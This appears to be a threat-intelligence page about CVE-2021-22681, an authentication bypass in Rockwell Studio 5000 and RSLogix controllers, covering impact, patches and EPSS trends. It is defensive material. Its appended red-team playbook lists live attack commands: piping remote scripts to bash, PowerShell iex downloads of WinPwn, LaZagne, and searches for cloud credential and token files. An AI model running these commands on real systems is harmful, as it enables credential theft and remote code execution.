CVE-2021-22681
Overview
This vulnerability is an authentication bypass affecting Rockwell Automation Studio 5000 Logix Designer (version 21 and later) and RSLogix 5000 (versions 16 through 20). The root cause lies in the flawed verification mechanism that uses a cryptographic key to authenticate communication between these software products and specific Logix controllers. The affected component is the key-based authentication process validating connections to multiple Rockwell Automation controller models including CompactLogix, ControlLogix, DriveLogix, GuardLogix, and SoftLogix series.
Vulnerability Description
Rockwell Automation Studio 5000 Logix Designer Versions 21 and later, and RSLogix 5000 Versions 16 through 20 use a key to verify Logix controllers are communicating with Rockwell Automation CompactLogix 1768, 1769, 5370, 5380, 5480: ControlLogix 5550, 5560, 5570, 5580; DriveLogix 5560, 5730, 1794-L34; Compact GuardLogix 5370, 5380; GuardLogix 5570, 5580; SoftLogix 5800. Rockwell Automation Studio 5000 Logix Designer Versions 21 and later and RSLogix 5000: Versions 16 through 20 are vulnerable because an unauthenticated attacker could bypass this verification mechanism and authenticate with Rockwell Automation CompactLogix 1768, 1769, 5370, 5380, 5480: ControlLogix 5550, 5560, 5570, 5580; DriveLogix 5560, 5730, 1794-L34; Compact GuardLogix 5370, 5380; GuardLogix 5570, 5580; SoftLogix 5800.
Impact
An attacker with network access to the affected controllers can bypass authentication controls without any credentials or user interaction. This unauthorized access enables the attacker to interact with and potentially manipulate industrial control systems, leading to unauthorized command execution, data exposure, or disruption of critical manufacturing processes. The lack of authentication enforcement undermines the integrity and security of the operational technology environment, increasing the risk of sabotage or operational downtime.
Solution
Rockwell Automation has issued an advisory (ICSA-21-056-03) recommending users of Studio 5000 Logix Designer version 21 and later, and RSLogix 5000 versions 16 through 20, apply the vendor-provided patches or updates that address the authentication bypass. Users should consult the CISA ICS advisory at https://us-cert.cisa.gov/ics/advisories/icsa-21-056-03 for detailed patching instructions and verify that their Logix controllers and software are updated to versions that include the fix. No alternative workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Rockwell Automation's Studio 5000 Logix Designer and RSLogix 5000 arises from a flaw in the authentication mechanism used to verify communication between Logix controllers and various Rockwell Automation products, including CompactLogix and ControlLogix series. This issue allows an unauthenticated attacker to bypass the verification process, effectively enabling unauthorized access to the affected controllers. The underlying problem lies in the reliance on a key for authentication, which can be exploited to impersonate legitimate devices. This flaw is particularly concerning given the critical role these systems play in industrial automation and control processes.
Attack vectors for this vulnerability are diverse and can be executed in several ways. An attacker could leverage network access to send crafted packets that exploit the authentication bypass, allowing them to gain control over the affected devices. This could be done remotely, making it even more dangerous as it does not require physical access to the systems. Additionally, the vulnerability could be exploited in conjunction with other weaknesses in the network infrastructure, such as inadequate segmentation or lack of intrusion detection systems, amplifying the risk of a successful attack. Scenarios could include manipulating industrial processes, disrupting operations, or even causing physical damage to equipment, depending on the attacker's intent.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Rockwell Automation products in critical infrastructure sectors such as manufacturing, energy, and transportation. An attacker gaining unauthorized access could lead to operational disruptions, financial losses, and damage to the organization’s reputation. Furthermore, the potential for physical harm to personnel or equipment cannot be overlooked, as compromised control systems may result in unsafe conditions. The high CVSS score of 9.8 reflects the severity of the risk, indicating that organizations must prioritize remediation efforts to protect their systems.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected software is critical, as Rockwell Automation may release updates that address this vulnerability. Additionally, network segmentation can help limit access to critical systems, reducing the attack surface. Employing intrusion detection and prevention systems can also aid in identifying and blocking unauthorized access attempts. Organizations should conduct regular security assessments and penetration testing to evaluate their defenses and ensure that they are prepared to respond to potential exploitation attempts effectively.
In conclusion, the vulnerability in Rockwell Automation's Studio 5000 Logix Designer and RSLogix 5000 poses a serious threat to industrial control systems. The ability for an attacker to bypass authentication mechanisms can lead to severe operational and safety risks. Organizations must take proactive measures to detect, mitigate, and respond to this vulnerability to safeguard their critical infrastructure and maintain operational integrity in an increasingly interconnected world.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-22681, with new telemetry indicating emerging attempts to leverage this authentication bypass vulnerability in Rockwell Automation’s Logix controllers. Concurrently, the Exploit Prediction Scoring System (EPSS) score for this vulnerability has risen significantly, reflecting an increased likelihood of exploitation in the near term. Although no new exploit techniques or ransomware associations have been identified, the upward trend in detection signals suggests adversaries are intensifying reconnaissance or preliminary probing efforts. This development elevates the threat level from a theoretical concern to a more imminent operational risk, underscoring the need for heightened vigilance among defenders monitoring industrial control system environments. The increased EPSS percentile ranking further confirms that this vulnerability is gaining traction within attacker communities, potentially accelerating the timeline for active exploitation attempts.
Update 2 — June 13, 2026
CSURFACE threat intelligence has identified a marked shift in the risk profile for CVE-2021-22681, as evidenced by a substantial increase in the Exploit Prediction Scoring System (EPSS) score, rising by over 30%. This upward adjustment signals growing confidence within attacker communities regarding the feasibility or value of exploiting this authentication bypass vulnerability in Rockwell Automation Logix controllers. Paradoxically, our telemetry indicates a significant reduction in detection activity, suggesting that adversaries may be adopting more covert reconnaissance techniques or that initial probing phases have transitioned into less noisy stages. The combination of these trends implies a nuanced threat landscape where exploitation efforts are becoming more targeted and potentially more effective, despite lower observable noise. While no new exploit tools or ransomware affiliations have surfaced, the elevated EPSS percentile and persistent upward trend in risk metrics underscore an increased likelihood of exploitation attempts in operational environments. Consequently, this evolution elevates the threat level from a predominantly theoretical concern to a more imminent operational risk, warranting heightened awareness and monitoring within industrial control system defense postures.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Rockwellautomation | Factorytalk Services Platform | All |
cpe:2.3:a:rockwellautomation:factorytalk_services_platform:*:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | Rslogix 5000 | All |
cpe:2.3:a:rockwellautomation:rslogix_5000:*:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | Studio 5000 Logix Designer | All |
cpe:2.3:a:rockwellautomation:studio_5000_logix_designer:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22681 |
| us-cert.cisa.gov |
GitHub CVE
x_refsource_MISC
|
https://us-cert.cisa.gov/ics/advisories/icsa-21-056-03 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22681 |